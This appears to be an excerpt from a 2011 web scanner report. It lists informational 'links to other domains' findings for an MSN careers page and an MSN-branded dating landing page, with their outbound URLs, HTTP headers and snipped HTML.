http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://download.live.com/?sku=messenger
http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://health.redacted/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836
http://hotmail.redacted/
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/MediaManagement/8B/I8G5005YKFRVZ3CDW8B.gif
http://img.icbdr.com/MediaManagement/DD/I8A3066PC5BVSN70NDD.gif
http://img.icbdr.com/images/MSN/magnifyresume.jpg
http://img.icbdr.com/images/custom/msn/496x120_display.jpg
http://img.icbdr.com/images/custom/msn/Howarejobseekersruiningtheirjobsearch.jpg
http://img.icbdr.com/images/icons/rss.gif
http://img.icbdr.com/v11.89/css/cbglobal.css
http://img.icbdr.com/v11.89/css/cbminisite/cbminisiteinternal.css
http://img.icbdr.com/v11.89/css/msn_full.css
http://latino.redacted/
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314
http://money.redacted/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.careerrookie.com/CC/Default.aspx?sc_cmp2=JS_MsnCareerRookie
http://msn.empleoscb.com/
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalcareers.112.2o7.net/b/ss/msnportalcareers/1/H.1--NS/0
http://music.redacted/
http://my.redacted/
http://office.microsoft.com/en-us/templates/CT101448941033.aspx
http://office.microsoft.com/en-us/templates/results.aspx?qu=resume+cover+letters&av=TPL000
http://realestate.redacted/
http://realestate.redacted/article.aspx?cp-documentid=27225933
http://rss.redacted/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript
http://specials.redacted/alphabet.aspx
http://thebubble.redacted/
http://today.msnbc.msn.com/
http://tv.redacted/
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=AP
http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc
http://www.delish.com/
http://www.delish.com/food-fun/best-burgers
http://www.erieri.com/
http://www.facebook.com/careerbuilder?v=app_28134323652
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3032619/ns/nightly_news/
http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp
http://www.myhomeredacted/
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /msn/default.aspx?SiteId=cbmsn_home HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67748
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=dcf2016c64cb429fb27d457728555284-349703517-wi-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1499044D328718EEFABAEEEE8EE257D2FAA022346CA994E74F3FC763E7064694D3CBE36DD95F8137CE8CB78DE29EED3EB; domain=.careerbuilder.com; expires=Mon, 30-Jan-2012 16:51:57 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR19
Date: Sun, 30 Jan 2011 16:51:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Jobs &
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbminisite/cbminisiteinternal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate & Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">

            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
<li><a href="http://msn.careerrookie.com/CC/Default.aspx?sc_cmp2=JS_MsnCareerRookie">Entry Level & Internships</a>
...[SNIP]...
<div>

<img src="http://img.icbdr.com/images/MSN/magnifyresume.jpg" alt="Jobs galore on MSN Careers, image .. Getty Images" />

<a href="http://msn.careerbuilder.com/custom/msn/postresume.aspx?siteid=cbmsnchPR" title="Let us work for you">
...[SNIP]...
<li><a href="http://office.microsoft.com/en-us/templates/CT101448941033.aspx">Download r..sum.. templates</a>
...[SNIP]...
<li><a href="http://office.microsoft.com/en-us/templates/results.aspx?qu=resume+cover+letters&av=TPL000">Download cover letter templates</a>
...[SNIP]...
<div class="linkedimg">
<a href="http://www.facebook.com/careerbuilder?v=app_28134323652" title="flip pane">
<img src="http://img.icbdr.com/images/custom/msn/496x120_display.jpg"width="528" height="120" alt="Contest" /></a>
...[SNIP]...
<div id="featuredArticleLeft" class="clearfix">

<img src="http://img.icbdr.com/images/custom/msn/Howarejobseekersruiningtheirjobsearch.jpg" alt="Jobs" style="float: none;" /><br />
...[SNIP]...
<a href="http://msn.careerbuilder.com/harvest/rss/rssarticlefeed.aspx?type=MSN&count=10&siteid=cbmsnRSS"><img src="http://img.icbdr.com/images/icons/rss.gif" /></a>
...[SNIP]...
<span><img id="InnerMiddle_mxsFeatEmp__ctl0_ImgFeatEmpLogo" src="http://img.icbdr.com/MediaManagement/8B/I8G5005YKFRVZ3CDW8B.gif" border="0" style="border-style:None;height:60px;width:135px;" /></span>
...[SNIP]...
<span><img id="InnerMiddle_mxsFeatEmp__ctl1_ImgFeatEmpLogo" src="http://img.icbdr.com/MediaManagement/DD/I8A3066PC5BVSN70NDD.gif" border="0" style="border-style:None;height:60px;width:135px;" /></span>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<div id="LastBingLink">
<a href="http://local.msn.com/news.aspx"><span class="BingLink">
...[SNIP]...
<input name="btnSubmit" id="btnSubmit" title="Salary Calculator" src="http://img.icbdr.com/images/plink/cbsalary/btn_search.png" style="border-width: 0px; height: 33px;" type="image" />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<br />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<br />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.237. http://msn.chemistry.com/cp/landing/44762 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/44762

Issue detail

The page was loaded from a URL containing a query string:

http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2117632

The response contains the following links to other domains:

http://advertising.msn.com/msn/
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://blstc.redacted/br/gbl/lg/1/t/msft.png
http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/om/js/lt/lt.js
http://c.redacted/c.gif?di=2558&pi=7327&ps=66851&tp=http://specials.redacted/mopsdk/standard/dating/msnshell.aspx&rf=
http://careers.redacted/
http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://dating.redacted/help/help.aspx?lid=413
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://dating.redacted/msn/index.aspx?mmrd=1
http://download.live.com/?sku=messenger
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/superfans/
http://entertainment.msn.com/video/?from=en-us_msnhp
http://feedback.redacted/
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://health.redacted/diet-and-fitness.aspx
http://hotmail.redacted/
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/gas-traffic.aspx
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://music.redacted/
http://my.redacted/
http://passport.match.com/passport/ppLogin.asp
http://realestate.redacted/
http://specials.redacted/alphabet.aspx
http://today.msnbc.msn.com/
http://tv.redacted/
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.google-analytics.com/urchin.js
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3096434/ns/msnbc_tv
http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp
http://www.myhomeredacted/
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=037f54bf-c459-4cb1-bdf0-dea3bb4b0e7c; expires=Sun, 29-Jan-2012 23:49:14 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:14 GMT; path=/
Set-Cookie: Session=SID=429C52FF-5BAA-4D34-9E95-19BBC144E553&Th=10&TID=516068; path=/
Set-Cookie: UMID=0e49d04c-67dc-4d95-b16f-dca26b7d5ee9; expires=Sun, 29-Jan-2012 23:49:14 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>

<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div id="reporting" style="display:none;"><img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=2558&pi=7327&ps=66851&tp=http://specials.redacted/mopsdk/standard/dating/msnshell.aspx&rf=" />
   <div id="omni">
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js"></script>
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
</div>

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3096434/ns/msnbc_tv">MSNBC TV</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://movies.msn.com/">Movies</a>
...[SNIP]...
<li><a href="http://music.msn.com/">Music</a>
...[SNIP]...
<li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/superfans/"> Superfans</a>
...[SNIP]...
<li><a href="http://tv.redacted/"> TV</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://health.msn.com/diet-and-fitness.aspx">Diet & Fitness</a>
...[SNIP]...
<li><a href="http://health.msn.com/"><strong>
...[SNIP]...
